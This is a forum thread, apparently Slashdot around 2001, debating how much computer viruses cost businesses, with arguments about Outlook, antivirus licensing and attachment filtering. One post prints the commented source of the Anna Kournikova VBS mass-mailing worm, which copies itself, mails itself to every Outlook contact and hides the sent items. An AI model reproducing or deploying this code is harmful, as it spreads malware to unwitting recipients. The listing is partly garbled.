is the cost of anti virus software and forced upgrades. NAI has a total lock on this software market (I think within the last few years they have managed to buy every single anti virus package) and is utterly gouging everyone. Just understanding their licensing terms requires a legal team.

we need a good GPL's antivirus application to counter this. Actually if there was one NAI would go belly up overnight. The viruses themselves probably cause minimal damage.

--

In all my years...

[Skyppey]

I have never had a computer virus affect my computer. I have been on the 'net of lo 3 years now. I don't know what the big deal is. Just keep your eyes open and don't read email that has a .src or .exe as an attachment. It's really not that hard.

Priceless

[john_locke]

Several hours in sysadmins' overtime- $500

Buying a new hard disk- $200

Teaching your employees common sense- Priceless

fools delema

[davonds]

you have your basic chaos theory/fractal problem, the factors involved in calculating the costs expand logarithmically as you investigate them. the basic factors are; losses due to hardware damage, losses due to software damage, losses due to dos, losses due to lost or destroyed projects, losses due to non productivity (employees who cannot do their job), losses due to diverted resources (IT staff who have to repair damaged systems, rather than do their normal job), losses due to outside consultants, losses due to customer defection, losses due to security systems (firewalls, anti virus software), losses due to reduced efficiency (due to firewalls, anti virus software), losses due to policing (cost incurred finding the perpetrator), not to mention all the secondary and tertiary costs. take this example, assume somebody was creating a piece of ground breaking software that would make all computers operate 50% more efficiently. now if this software was delayed or destroyed due to a virus, imagine the incalculable repercussions. so any estimate, is just a guess at best, and doesn't include all the possible factors anyway, and probably includes factors that are vaporous or don't apply. good luck with your project, you'll need it.

The cost of Microsoft

[mkcmkc]

Viruses probably are quite expensive, but this is not a generic cost. They should be accounted for primarily as a cost of choosing Microsoft, just as lung cancer should be accounted for primarily as a result of smoking.

--Mike

Re:The real cost of viruses...

[MeNeXT]

As you see it a x386 would do the job of a Pentium because the only diff is time. It's just that the x386 would take a little longer.....Maby we should keep the old systems and just get rid of the breaks, time in/out, fire drills, meetings etc....

Re:How much do virus *myths* cost businesses?

[JWhitlock]

While it is still up, go get "Bad Times", by Laika, off of Napster. Probably one of the first mass emails set to music. It's off their latest album, Good Looking Blues, which is quality all around.

A dozen images

[esconsult1]

which took a day in Photoshop were gone. Multiply the 8 hours at $n per hour...

VBS.SST@MM

[gdyanky]

Alanis Morisette said it best. "Isn't it Ironic, dont you think" I havent gotten any details on it yet..but where I am it is spreading pretty fast. Seems like symantec and sarc are being hit hard.

Re:VBS.SST@MM

[orcus867]

I hope you mean that Symantec is being hit hard with requests for their AV software... it would be scary to this otherwise as the virus has been in the wild since August!

Re:VBS.SST@MM

[RedX]

Actually, believe it or not, Symantec still does not have an update to detect this worm while most of their competitors have had protection since last August. Once again, Symantec is last. Our company killed incoming email several hours ago awaiting an update from Symantec.

Re:Microsoft

[ScuzzMonkey]

Oh, yes, more frivolous lawsuits, that's exactly what we need.

You ask, is Microsoft free of any liabilities (the answer happens to be 'yes' if you opened the software and agreed to their ridiculous shrinkwrap license, but we'll forget that for the moment)? I would ask, is the user suddenly free of any responsibility? I mean, come on, Bill Gates didn't come out and sit down at your computer and open up that infected piece of mail. If you opened it, you've got one person to blame--yourself. I see this happen all the time, and in clear violation of company policies--you just don't open a file you get from someone you don't know or that you didn't ask for.

Regardless of how often or how much you sue manufacturers for, in this environment it will accomplish very little. These systems are complex enough that anyone with any significant motivation is going to find a way to distribute viruses. The only real solution is user education. I wish there were better safeguards in what was out there, too. But you know what? If I was that unhappy with them, I'd switch to a better product. That's on me, not Microsoft. People who are dumb enough to use their products without taking adequate precautions shouldn't be whining about it in court.

Real costs

[orcus867]

There are several factors that I have always seen used to justify cost of virus infections: The sysadmin time, the infected user's time, the bandwidth on the network, and used space on the network drives due to the virus.

However, the only real cost is that of the infected user. The sysadmin's time, whether it be disinfecting a computer or troubleshooting a non-related network problem, his time is already paid for. The same goes for network bandwidth and server space; both of these cannot be quantified into total costs as they too are already paid for.

The only true cost indicator of virus infections are the hourly costs of the infected user during the time of the cleanup and the hard cash purchase of antivirus software. One should also take into account the amount of time the infected user will talk about their virus infection well after the sysadmin has cleaned up their computer.

Not significant unless servers affected.

[Bistromat]

$17.1 billion? Not even close. The true cost of virii is negligible unless one infects a mission-critical server - an employee's time spent reformatting a system is valuable, certainly, but not nearly as valuable as that Win2K Advanced Server suddenly seems when it goes down (or worse, emails your trivially-decrypted NT passwords to some kiddie in Zimbabwe), preventing your customers from buying those highly profitable Thneeds, or whatever it is you sell. After all, -everyone- needs a Thneed.

Back to the point, though, I've never heard of a virus infecting a major server - usually, people aren't reading their mail on servers, and only the most mentally-deficient MIS would be retarded enough to open email attachments or download warez on a mission-critical server. And then, well, he deserves what he gets.

--nick

Ok... just a reign on the creative math here.

[AndyMouse+GoHard]

So, it's a good thing the 12 hours doesn't cause 12 hours of unprepared time wasting rather than just the 8 hours you state. Then, it would be possible for that 12 hours to cause 12 hours of wasted time, and so on, ad infinitum.

Your point is a good one, the original 12 hours represents a loss. But, at the beginning and end of that 12 hours you had the same preparedness for the manufacturing site. Thus, the 12 hours has not affected that at all. It stole the time you might have prepared, yes, but that time is part of the 12 hours, not extra to be added on.

Troll? I prefer "Senior Agitation Engineer"...

Re:Opportunity cost

[AndyMouse+GoHard]

So, suppose I delay purchasing a product from the company by a day (or, even *worse* to their bottom line, by a week!). How does this affect their financials. Do we shift the graph again and show how I caused significant losses? What if I decide not to buy it at all? Have they incurred huge losses over time? No. Just the loss of one sale, of a particular dollar value at a particular time.

You must be an accountant, for your creativity is incredible;)

A cry for help...

[AndyMouse+GoHard]

I read your post, and you are so right. I saw myself in that letter. I was just trying to help, but look what I've done!

It's been a real catharsis for me. It won't be an easy road to travel, but thank-you for showing me the truth of what I am.

Re:Stupidity

[AmigaAvenger]

Not to mention, most major areas of ND have DSL &/or cable, and have had them for MUCH longer than other areas in the country. (In addition to a statewide fiber optic networks for the universities.)

Re:"Loss" == "IRS allows you to write it off".

[Rudeboy777]

Never have I seen a post somehow half flamebait and half insightful! No wonder the moderators can't figure out what to do about this one. I'd mod it up just because this takes way more skill than your garden-variety troll post.

The cost is zero ...

[BlowCat]

because I only install GPL'ed virii on my system.

I wrote for CE once

[TarPitt]

Computer Economics, at least approx. 5 years ago, was more a publishing house than a research firm. Most of the articles were freelanced, though the author is not credited with authorship (they wanted to give the impression of having a large in-house research staff). I would take anything out of here with a large grain of salt.

Is this number footnoted? Is an explanation of the methodology behind it explained? Is there an author listed for the article? If so, what is the author's credentials? Can you possibly contact the author and ask where this number came from?

Personally, I would try to find other sources for a number of this type. Open source principles apply to research as well as code. If people don't publish the "source", don't buy it!

Re:It can cost a lot...

[am+2k]

Take today for example..that big new scary .vbs virus is running around but we are protected. Why? Not because we run Linux (We do..just not most people), but because I block *ALL* .vbs attachments coming in our network.
I'm waiting for the day a .exe outlook virus is spread...

If you're not blocking .vbs files TODAY, you need to be asking why not.
Well, I use Macs. It's that simple.

Knock on effect

[Kiaradune]

I work for a large College. I'm a comp. tech that wanders around to different outcenters and fixes their problems. This includes virii. Being a College, it's a heavy user of MS products, especially MS Word. My first run in with a virus was a Word 97 Macro, Ethan. There was no network, so the students used floppy disks. The staff at a particular outcenter were requesting that users give the disks to staff at the start of a session to virus check them. Only one computer had the latest software and definition files on. Each disk went in to this machine, the disk was checked (which could take a minute or two) then returned to the student. If the student had another disk they wanted to use, they had to hand this in as well. In a room with 24 machines, at about 2 minutes/disk, that's almost an hour's work and waiting for both staff and student for each session, of which there were several each day. It all added up. As part of my job, I had to install virus checkers onto ALL the machines, to prevent this disk checking procedure. The machines were really old, the CD-ROM drives disfunctional. The BIOSs were passworded, but the guy that had passworded them had since died, without telling anyone the password. So the only option was to take each machine apart, reset the CMOS with disconnecting the battery, plug in a hard drive with the software and definition files on, then install, put the machine back together, then virus check the entire machine. That's without taking into account the damage that the virus can do (which isn't much). That's one way of looking at it, but don't forget the other way: What damage in terms of reputation to the college has the virus done? Many students become scared with talk of virii. All it takes is for people to say 'I went to xyz college and got a virus on my disk which got onto my home computer'. Also, students can become frustrated at having to wait around for their disks to be checked, and indeed many did not care about the procedure and used their disks, unscanned. The time I spent driving around to outcenters to solve their virus problems could be better spent improving their current facilities, in turn making students happier, which has the knock on effect of more enrolments, which means more money for the college (That's my delusion of grandeur for the day) Be cool. Hi, I'm a .sig virus. Please copy my into your .sig and help me spread!

I can tell you exactly how much it costs my biz

[marklein]

It costs $810 for McAfee's Total Virus Defense Suite plus man hours to maintain it. If people aren't protecting themselves, then you might as well calculate the cost of earthquakes or floods. Virus attacks are an Internet act of nature. You either prepare yourself ahead of time, or you're a bloody fool.

Re:Microsoft

[Verteiron]

Sure enough, the first anti-Microsoft gets modded up.

Re:And Then...

[Drakantus]

Your company is paying someone $120/hr to install windows?

Are you hiring?

Woah!!

[James+Foster]

All these companies are getting ripped off! There are people out there that will attack your computer FREE! Don't pay for virus attacks anymore ;]

Re:"Loss" == "IRS allows you to write it off".

[wrinkledshirt]

It might not be a "real" loss, but handling these problems can be a "real" expense, and as such can affect the balance sheet. It's sort of IRS-irrelevent -- if a specific cost is taking a huge chunk out of your profits, it doesn't really matter much whether or not the cost can be written off. That'll just minimize the tax burden, but you'll still want to do what you can to address the cost and minimize it so that your profit margin would be greater...

Anti Virus Software worse than the viruses

[SCHecklerX]

I don't work in tech support anymore (Thank god!)

But when I did, most problems anybody had with their machine was the damned virus scanner being cranked up and sucking the life out of the machine every time it opened any type of file.

Why companies spend so much money on something that common sense can fix is beyond me.

If the users are too stupid to not run things they get in attachments, fire 'em!

Virus scanners are viruses themselves afaic.

Re:What about the positive benefits ?

[nqp]

Yes, and I guess the user-interface and the crap-code behind it are going to be tied together as long as M$ get their way....

If you could write a client with the same (outlook) interface, but better (*nix) code/OS behind it then this point would be mute.

Re:Opportunity cost

[nqp]

Isnt the key thing here how it affect different companies... If one company is M$ based and the other Unix then the virus will affect one dramaticly more than the other... If there are no Linux-based companies then all are affected reasonably similarly, and it will be harder to estimate real competitive loss. Today the radios are blaring about the Anna K virus, but we have no windows desktops in our company, and consequently have not been affected at all by it... but maybe some of our distributors/suppliers are ? But I havnt spent any time today fixing any email servers / user mailboxes.

What about the positive benefits ?

[nqp]

This is not advocating viruses.

But they do force us to address the issues of security, robustness and vunrabilities in our e-mail systems. The longer we go without viruses, the larger the impact they have when they do turn up.

An possible analogy is with how our human immune systems have had to dramticlly improve with the advent (last 1000 years or so) of crowded city-living. "Plagues" in Europe wipped out 50-70 % of the population on many occasions. Pretty severe, but not enough to destroy the population outright.

The same "Plagues" wipped out 100% (in some cases) of native american and south american communities when they were transported across the atlantic. That these communities had had no exposure to epidemic diseases goes a long way to explaining the difference.

If an there exists a possible exploit then it is reasonable to assume that its only a matter of time before the exploit will be used.

So when you are counting the immediate cost of email-viruses, how do you factor-in the long-term benefits ? i.e. Because you implemented stronger virus-protection systems this time, you have averted a catastrophic (fatal) virus infection later.

And is it really such a cost to ditch outlook for a simple, free email client that does not run scripts ?

Re:Microsoft

[NineNine]

Brilliant. And have you ever considered how much productivity is GAINED by having VBScript embeeded in email? My bet is that it would outweigh these silly 'viruses'.

And now i wonder...

[Quazion]

If Norton and ofcourse McAfee make miljoins of dollars on The virus scanner, why do they keep writing new Virusses also ? to make even more money *DOH*, but it isnt fair, i say if we bannish the commercial virus scanner/protection companies so noone makes money out of it we would have less virusses, cause then it wouldnt create any extra funds for those companies who also write those damn viruses them selves!

Lets create a open virus scanner that beats them all! this would leave only the home made VBS scripts and simple viruses to be created.

Dont say i am paranoid! i am i am i am....but open your eyes it is happening just cant finger out who and where yet...

If the war on drugs is any indication...

[schnitzi]

If the war on drugs is any indication, this figure is a gross exaggeration. Whenever you talk of the "street value" of the narcotics confiscated in a bust, know that you're hearing total bull. Why? It makes the "good" guys feel more important, and the bad guys worse. (Very stupid, actually, because the real effect is that kids hear the figures and think, "Wow, you can make some serious jack selling drugs.") I wouldn't be at all surprised if the same sort of crap going in the sensationalized war on viruses.

Don't get me wrong, I think virus writers should be strung up by their eyelids...

virus hoaxes are among the costliest..

[rebelcool]

worse than real viruses, are fake ones. Remember the goodtimes hoax? It's 10 years old and *still* being spread around. A few years back I read that the estimated cost of it over time was already up to over a billion..this was 2 or 3 years ago.

Why is it expensive? Because newbies who dont know any better forward it to everyone they know..that takes up bandwidth, and more expensively, storage space on e-mail servers (and 10 years ago, BBS harddrives) Can you imagine how many giga (if not terra) bytes have been consumed by that little message?

Re:The real cost of viruses...

[H310iSe]

Perspective. A) you're wrong, as other posters have pointed out, in your logic about costs - you can legitimately claim lost productivity, either through re-assignments of work, inability to work, or other impediments generally virii-related (yea, it's not the plural but it sounds cool and latin). And in this model I think 17 billion is conservative (based on my experience in a medium-sized law firm). HOWEVER you have to put this perspective, the cost of going to the bathroom is estimated in the billions as well (can't find the link now but will post when I do). The cost of forwarding virii warnings (social engineered virii which use people and computers to propagate) costs ... millions if not billions. pr0n. need I say more? so it's not a matter of how you look at it, it's a matter of what you at next to it. *i deny sigs exist*

Re:ANSWER: Where these numbers come from!

[m00t]

When we got hit by ILOVEYOU this is the course of action our brilliant IT staff took.

1) turn off the mail server (after 20 minutes and 900+ emails... per person...)
2) unplug the mail server from the network (10 minutes... [wtf?])
3) turn it on and filter out all the viruses from people's email (3 hours)
4) find a patch for the virus filter... (2 hours [again, wtf?])
5) start the mail server back up as 'normal' (1 hour)
6) start deleting the deluge of 'DON'T OPEN BLAHBLAH EMAIL ITS A VIRUS!!!!!!!!' (30 minutes)
7) start identifying users that were hit (3 hrs - 4 days)
8) restore critical systems from backups (1 - 3 hrs [why wasn't this done sooner?!])
9) hunt down users that had direct drive mappings to critical systems with .html's and .jpgs (live web server, etc) and kill them. (1hr)
10) get around to actually fixing said machines... (2 days)

all in all it can be from 7hrs to 10 days if the IT staff isn't properly equipped.

And even if it is, there's no telling how many files were overwritten and might be inadvertantly opened again, starting the whole thing over.

Re:OnTheFly Source : Commented version

[m00t]

On Error Resume Next

'get windows scripting shell object handle
Set ojbWSS = CreateObject("WScript.Shell")
'write virus creation data to registry (this script apearrs to have been auto-generated by "Worm made with Vbswg 1.50b" (vbs worm generator 1.50b?)
ojbWSS.regwrite "HKCU\software\OnTheFly\", Chr(87) & Chr(111) & Chr(114) & Chr(109) & Chr(32) & Chr(109) & Chr(97) & Chr(100) & Chr(101) & Chr(32) & Chr(119) & Chr(105) & Chr(116) & Chr(104) & Chr(32) & Chr(86) & Chr(98) & Chr(115) & Chr(119) & Chr(103) & Chr(32) & Chr(49) & Chr(46) & Chr(53) & Chr(48) & Chr(98)

'get handle to file system scripting object
Set objFSO= Createobject("scripting.filesystemobject")

'wscript.scriptfullname = Full path to the script being run by the Windows Scripting Host.
'copy this script to Special Folder 0 ('c:\winnt' on my machine)
objFSO.copyfile wscript.scriptfullname,objFSO.GetSpecialFolder(0)& "\AnnaKournikova.jpg.vbs"
'if we haven't already mailed ourself around yet, do so.
if objWSS.regread ("HKCU\software\OnTheFly\mailed") "1" then
'spread ourself via outlook's address book
SpreadByMail()
end if

'if month is january and day is 26th, execute "Http://www.dynabyte.nl" using the run command (start->run)
'this will open an explorer (or netscape if it's default browser?) window and "browse" to this website.
if month(now) = 1 and day(now) = 26 then
'WshShell.Run (strCommand, [intWindowStype], [bWaitOnReturn])
'do not wait for this to return before we continue running
objWSS.run "Http://www.dynabyte.nl",3,false
end if

'get file object handle to this script
Set objTextFile= objFSO.opentextfile(wscript.scriptfullname, 1)

'read it into a string
strTextDocument= objTextFile.readall

'close the file
objTextFile.Close

Do
'if this script doesn't exist (?) create it. continue looping forever.
If Not (objFSO.fileexists(wscript.scriptfullname)) Then
Set objTextFile_2 = objFSO.createtextfile(wscript.scriptfullname, True)
objTextFile_2.write strTextDocument
objTextFile_2.Close
End If
Loop

Function SpreadByMail()
On Error Resume Next
'create handle to Outlook
Set objOutlook= CreateObject("Outlook.Application")

'make "sure" it really is outlook
If objOutlook= "Outlook"Then

'grab handle to MAPI namespace object
Set objMAPINameSpace=objOutlook.GetNameSpace("MAPI")

'grab handle to Addresslists in the MAPI namespace
Set objAddressLists= objMAPINameSpace.AddressLists

'for each addressList in the addresslists
For Each objAddressList In objAddressLists

'if there any addresses in this address list then...
If objAddressList.AddressEntries.Count 0 Then

'... get a count of the addresses in the list
lngAddresses = objAddressList.AddressEntries.Count

'and for each one...
For lngAddress= 1 To lngAddresses

'create a new email message
Set objMailMessage = objOutlook.CreateItem(0)

'get handle to address
Set objAddress = objAddressList.AddressEntries(lngAddress)

'set the "to" field to this address
objMailMessage.To = objAddressList.Address

'apply subject...
objMailMessage.Subje ct = "Here you have, ;o)"

'... and body...
objMailMessage.Body = "Hi:" & vbcrlf & "Check This!" & vbcrlf & ""

'set the script copy we set aside in the special folder as our attachment
set objAttachment = objMailMessage.Attachments
objAttachment.Add objFSO.GetSpecialFolder(0) & "\AnnaKournikova.jpg.vbs"

'set the message to be deleted after submission (won't show up in SENT Folder)
objMailMessage.Delet eAfterSubmit = True

'make sure the TO field isn't empty
If objMailMessage.To "" Then
'send the bugger to the unwitting victim
objMailMessage .Send

'We've mailed someone, so make sure the script won't re-execute
objWSS.regwrit e "HKCU\software\OnTheFly\mailed", "1"
End If
Next
End If
Next
end if
End Function

Re:Stupidity

[m00t]

interesting if you set it to show infected computers only canada, california, washington, texas and most of the east coast US show up as having more than 100...
"hmm"

:)

Re:How could it *not* cost a lot of money?

[ocbwilg]

If your users have unbacked up data on their machines then it's not the fault of the virus, but of your IS department. We have file servers for a reason. It's our policy that they store everything on the server. If they fail to do so, it's their fault. And to be honest, I've deleted all of the files on a users local machine on more than one occasion just to prove the point. It only takes one or two incidents before word gets out not to store anything locally.

Licensing for AV software is just the cost of doing business these days. It's another piece of software, and if you are using preventative measures like AV software with hueristic scanning, then you are much more likely to fare well in an outbreak. But most PC vendors include AV software and licenses for each system you buy anyway, so it's not really an added cost.

Calculating the actual impact of a virus...

[Gruneun]

I find that the easiest calculation of a virus impact is:

Multiply [number in tech staff]
by [people who open the email after being warned]
then multiply by [time it takes to close eyes and count to 10].

We leave out the guilty parties time because it generally doesn't impact the the productivity of the company, anyway.

Re:Plural of "virus"

[bigwillystylie]

I think that is some sort of Germanism (?)

Re:Opportunity cost

[bigwillystylie]

True.
I work for a new IT co (well, the product is starting to mature) it would be really bad if email/webserver was out. Yes, phones would work but email takes thought so can be more accurate. Luckily we have a good firewall and more than competant sysops so, so far we have been lucky.

Re:Microsoft

[moishel]

Um... I remember virii on the Mac being a big problem in the late '80s because of the fact that the MacOS opened up and executed the resource for *anything* -- put a floppy in with the wrong WIN (was that it? memory fails me) resource and -- bang -- your entire computer is infected, without the user ever executing a program. Sure, Microsoft's scripting could be better thought out re: security but at least you've got the option to not run the script.

My point is just that lots of 'ease-of-use'/cool things get put into OS's & applications which can be exploited by a savvy virus. It's easy but inaccurate to blame Microsoft. Who knows what kind of virii we might see attacking Linux now that it's becoming more mainstream. I don't know my UNIX/Linux history at all but have there ever been virii spread via emacs? Seems to me like it's ideally suited for that (but I'm anxious to hear why I'm wrong).

-Moishe

Re:The real cost of viruses...

[dachshund]

I think you both have a point. Certainly money is lost due to wasted hours, lost material. On the other hand, corporations routinely overstate these costs. For instance, if a paralegal loses 5 hours, I'm certain the loss is recorded at the external rate (the rate the company bills outside customers) even if the paralegal is not working for any particular customer at the time. It'd be too much trouble to get the numbers right, and wouldn't benefit anyone but the virus's creator. This sort of half-sloppy, half-deliberate overstatement is common in hacking cases (lots of books about this) and is encouraged by the authorities because it helps them build cases and get funding.

Re:"Loss" == "IRS allows you to write it off".

[markmoss]

It does get written off -- but not as an explicit line item. Rather, you have lost sales or delayed projects because people were busy chasing viruses rather than doing their normal jobs, possibly overtime for the computer sanitizing crew, and so on. Costs go up and profits go down, and that goes into the tax return. Charging a "casualty loss" on top of that would be double-dipping.

Re:Microsoft

[markmoss]

But your script is not embedded in the e-mail, it's running in your computer, right?

The one non-virus application of scripts embedded in e-mail I have heard of is a HTML script that silently sends back copies of all replies and forwarded mail to the originator, so he can track what was done with his e-mail. That's not a very friendly application either, but the infectiousness is too low to count as a virus. Or there may be people that put an animated picture into their e-mails -- I'd figure anyone doing that has way too much free time...

conspiracy theory

[markmoss]

I don't really believe that conspiracy theory, but as for motive -- wouldn't it be nice to own the one virus filter that has the cure before the virus is discovered in the wild? 8-)

lusers' or Microsoft's fault?

[markmoss]

I've seen a lot of comments about "not so bright" people getting hit by viruses. There's quite a lot of truth in that--every virus that's run through my company's mail system was introduced by someone at headquarters, and I know they're all a pack of dolts. 8-) And I spend less than 5 minutes a week updating my virus protection and the only virus I ever got hit by was not one I opened, but a boot-sector virus spread by the corporate servers. But really it doesn't depend on intelligence; the people at risk are anyone who simply uses their computer as a tool without spending weeks learning about the bizarre inner workings of Windows & Outlook.

Now if Outlook's default setting was to display the message text only, then ask
"There is a program of unknown origin embedded in here. It could be a virus, and may not have been sent by the purported sender of this e-mail. Do you want to run it?"
then anyone infected by an e-mail virus would indeed be a dolt. But the default settings are to conceal whether an attachment is executable or not, and Microsoft "thoughtfully" provided several ways to still conceal an executable even after you've disabled scripting in e-mails and set it to display the filename extension on attachments -- if you even know all the extensions that might contain some sort of program. Then there are all the other security holes in Windows, such as whatever it was that let the servers reach out and touch my boot sector--I don't know why McAfee running on both the servers and my computer didn't catch it, but regardless of anti-virus software, no damn way should an OS allow a remote program to change the boot sector without notifying the user!

Re:"Loss" == "IRS allows you to write it off".

[onepoint]

Again it's all depending on how you document your time. As I said in my earlier post, DOCUMENTAION is what the IRS looks for, and as the poster above mentions "If your company did time accounting in a similar way ... but it would be collected into a place where it mean something to the bean counters"

And the bean counters know how to adjust the books to show that a "loss" has occured.

an offtopic note :
For any independent consultant out there, you should have the following with you at all times. A dated log book ( manuel entry) showing the following.

start time :
a)when you get in the car write the miles down
b) travel type business or personel
c) gas bought and miles at that time
d) miles /time at the arrival to the site

offsite / on site Office time :
a) work done and billable to your client
b) sales call and presentation ( time used )
c) food expense (even if you made a ham sandwich at home make sure you that inclused it in your weekly summary of expenses releated to work
d) any and all purchases done releate towards the project ( yes 3m stik-it notes count and are billable )

3) home office ( i'm not to sure about this because I don't work form home but this is what otheres have told me
a) log start time at the computer
b) measure the amount of space used for working and total area of your home ( this percentage your account will need but I don't recall why )
c) monitor all telelphone calls that are use for business or better yet get an office line
d) keep business expenses and personal expenses on different credit cards and bank accounts. this applies to everything if you realy want to work your books to get maximum write off

4 ) general
a) log everything and anything so that when you get your audit you'll have proven documentation of all your transaction.

it's a big pain in the butt. It's also worth the extra 20 minutes a day. I saves me about 12% on my taxes over the year

these are the basics
I hope I've helped someone

spambait e-mail
my web site artistcorner.tv hip-hop music news
please help me make it better

Anna Kournikova

[tacohead5]

Whenever I look at pictures of Anna Kournikova, my body temperature rises and my palms get sweaty? Do you think I got that new virus?

???

Cost Formula

[tacohead5]

money spent dealing with virus attacks = $1.1 Billion money given to accountants in little suits to research virus costs and get their names printed in magazines = $16 Billion

Re:Microsoft

[swimmar132]

... you just don't open a file you get from someone you don't know...

Yes, but a lot of these viruses send copies of itself to people on your contact list.. and presumably, people on your contact list know who you are.

Wrong, the map does not chart stupidity.

[jotaeleemeese]

If at least the map showed percentages of computers affected per location then it would have some meaning representing lack of preparation. It just reflects which countries have more computer users than others.

Re:How much do virus *myths* cost businesses?

[jotaeleemeese]

I worked in Y2K stuff, I saw hundreds of related problems solved and saw what happened when the problems were present.

If you think it was a myth is because you were not there slaving yourself solving the problem.

I could not agree more about the cruft part....

Re:$0 since fall of 1998.

[jotaeleemeese]

That is the point! Viruses do cost you money! They are so prevalent that they are part of the job! Part of your salary is the cost.

The question is: why is everybody still using Outlook!?!?!?!?

Why?

Re:The best way to pay for the effects of viruses

[jotaeleemeese]

The culprits:
1.- Virus writers.
2.- Stupid managers and Sys Admins that keep using stupid email client software.
3.- Stupid email software.
4.- The users?????

There is pine for Windows, even Netscape and many others.

To blame the users for opening a message in an email program is just plain ridiculous. I have gotten viruses that seem to come from legitimate people and you can not know they are viruses until you open them. Your email program should not be designed to execute anything at all, to execute something should be a concious task in which you conciously decide to execute or open something.

The solutions:

1.-Use a serious mail server.
2.- Don't use unsafe email clients.
3.- Educate your users.

If we are providing users with insecure technology please lets not blame them for what is other people mistakes.

Profitable virus...

[shic]

I would be interested to hear from any corporate users who honestly state that the long-term effects of a virus were positive. It's hard to deny that viruses have a massive potential cost, not limited only to diminished direct productivity and lost data, but more significantly with regard to credibility of the organisation. That aside, I suspect users most at risk from viruses often coincide with those who would benefit most from a "clean start."

It would seem to me, that some organisations for whom a skirmish with a virus might be just what is required to provoke adoption of better practices. How can you factor in the reduced costs associated with an ability to recover from a hardware failure a year later? Is it better to suffer from a virus sooner or later? Can anyone associate a cost with the technically inept associating divine accuracy of anything on-screen? Conversely, what long term costs are incurred when people actively avoid technology for fear of its inherent problems? [Remind me again, what were your virus costs, Mr. Norton?]

Virus Cost

[xkenny13]

Certainly it costs money to buy Anti-Virus software, and it costs overtime to clean up the mess, and then to get people caught up after you've neutralized the situation.

Do you send your other personnel home at this time? No, probably not. If for no other reason, you probably don't have legal standing to simply send them home without pay in the event of a virus attack.

Soooo ... if you're down for 6 hours, that six horus of paid time with very little productivity (not counting cleaning out your desk, watering plants, or redecorating your office).

When asked what the biggest expense is in the budget every year, my boss didn't even take the time to blink before he said "Salaries".

Consider six hours, times the salaries of EVERYONE who's lost productivity and 17.1 billion doesn't sound like such an astronomical number ... especially since six hours is a pretty paltry figure, given that some companies were down for DAYS after the "I Love You" virus hit.

Low security clears the way for DoS-attacks.

[Joohn]

If you get a virus into your computer, I guess you could blame yourself since you decided to use windows. However, lately so-called DoS attacks has been a popular way to "hack" webplaces by some ill-disposed people. To set up such an attack, you first need to install trojans in pretty large amount of computers. Of course, to be able to install these trojans, these computers can't have very much security, which makes MS windows computers a great choice. The owners of these computers are usually not aware of this. So, the damage caused by viruses and trojans doesn't always affect only the companies who are using os's with lack of security (windows), it can hit anyone. Microsoft sure makes a lot of money, but that's on behalf of others.

Fuzzy math

[stigmatic]

Well lets do the math here in accordance with the Dubya methods.

1.5 million dollars to post announcements across the world to announce you got hit by a virus.

200 hours of employee downtime complaining about the virus when they should be running Norton, avg estimate lets say 10.00 an hours x 200 = 20k a day spent bs'ing

Corporate price of Norton 1.2 million (weiging out government kickback schemes) vs. 19.95 consumer price
Media overhyping without a real clue
priceless...

Cost?

[Anagon]

Today, we've been hit by the AnnaK. VBS Script. It should cost us about $100 USD, total, for coverage of nearly 400 employees. Thats about all I make per day. It is my opinion, that certain companies enlarge the amount of money that virus attacks really cost, mostly for insurance purposes. The worst that can happen, is a few machines have to be reghosted, and the mail server is a little laggy. Anyone who has a properly configured network (antivirus, multiple mail servers, pleanty of disk space, etc) should only have to pay their admins the normal daily salary. Virus's don't cost anything other than that.

Re:How could it *not* cost a lot of money?

[Ben+Schumin]

That is a flawed argument. If someone is dying of cancer, it doesn't make it okay to murder them. If someone is stupid enough to not duplicate their data somewhere, it's not okay to delete it for them. So, this is a cost of the viruses. And it happens to hundreds of users at once across an orginization. That costs money.

Of course you need AV software to do business, but it is still a cost of viruses, which is what the article asked, and I was answering.

Re:How could it *not* cost a lot of money?

[Ben+Schumin]

The fact that that works needs to be done just proves that viruses cost money. Thank you for playing.

Re:"Loss" == "IRS allows you to write it off".

[ex+pope+john]

Try this analopgy. You work for a living and commute to another town. One morning your car is taken by you kid for a joyride and thats the only way you can get to work so you just don't get paid that day. Kid brings the car back after lunch but its oo late so you miss the whole day. So you dont have $xx that you would have had if you made it to work.

Same as a virus to a business.

So if Loss is the wrong word - waddaya call it then.

Call it '**it happens" and so the headline story should should read "businesses around the world had $20biilion worth of **it happen to them last year because of computer virus"

Re:OnTheFly Source

[Nickoty]

viruses in BASIC.. now, if somebody had told you that ten years ago, would you laughed? believed them?

Re:How could it *not* cost a lot of money?

[Nickoty]

why not just filter all attachments that comes with a file named '*.vbs' (and what scripting suffixes there are in Windows world. Just check all suffixes that are registered in the registry to see what there is. Or even simpler, just allow known extensions to pass thru the company mail server, such as jpg zip png. When one fails, you could have it auto-mail some admin that checks what kind of file it is, and if the extension would be allowed to pass, adds it to the 'allowed extensions' list so future attachments pass thru. You could probably quite soon have covered all extensions, cutting the administrative overhead to practical nill, and no longer get these EXTREMELY beyond reason LAME 'viruses'.

Re:computer virus attacks?

[Nickoty]

yeah, as in 'clueless people running untrusted scripts without checking them'. I don't think that quallifies as a 'virus'. Rather 'Cluelessnessexploit', or CLNE

Re:OnTheFly Source

[Nickoty]

at least that would give it a little, but still, more dignity. What we need now is a virus written in C64 basic-with-line-numbers. In five years, if the common Joe uses Gnome, expect bash viruses to become common. urgh!

Re:How much do virus *myths* cost businesses?

[Nickoty]

ok, so for foreigncultural fools, just what is a 2x4??

Re:How much do virus *myths* cost businesses?

[Nickoty]

perheps it was a win for business, when you include the revenue from stockpiled cans'n'ammo?

Re:How could it *not* cost a lot of money?

[Nickoty]

I understand I speculated about things somewhat of the topic you gave answers to and I appologize if that didn't show through. The thing I wonder and that still do puzzle me is why so many companies doesn't filter of .vbs. They have happened before (ILuvU) and now it happened again...

And that suggestion I made, about having each *new* never-checked extension read by somebody - is it really so unimaginable? Once .ssf has been rejected once, it doesn't reach administration. Only 'new' extensions pass by. Until some moron figures that out and starts mailing attachments with new extensions, wouldn't it work? And the dont-let-anybody-see-the-ceo-mail problem could be handled by just showing the _extensions_ (not the mails - or filenames - or header, just the extension, as in 'JPG'). The admins could be trusted to do that - they have control over the network anyway, right?

Am I naive? Anyway, _at least_ filtering *.vbs seems almost obilgatory. Lots of gain at low cost.

You Realize...

[chrislord]

There are other extensions in the MS script host? not only is *.VB used, but *.JS, which can be just as damaging, as it can be used by the WSH too. But you cant just block all *.JS, since many sites use this for clientside including of scripts.

Re:You Realize...

[chrislord]

VBS files can be used as script attachments as well. What Im saying is that WSH supports JS as well as VBS files for doing Windows Scripting.

VBS/SST

[SiriusBlack]
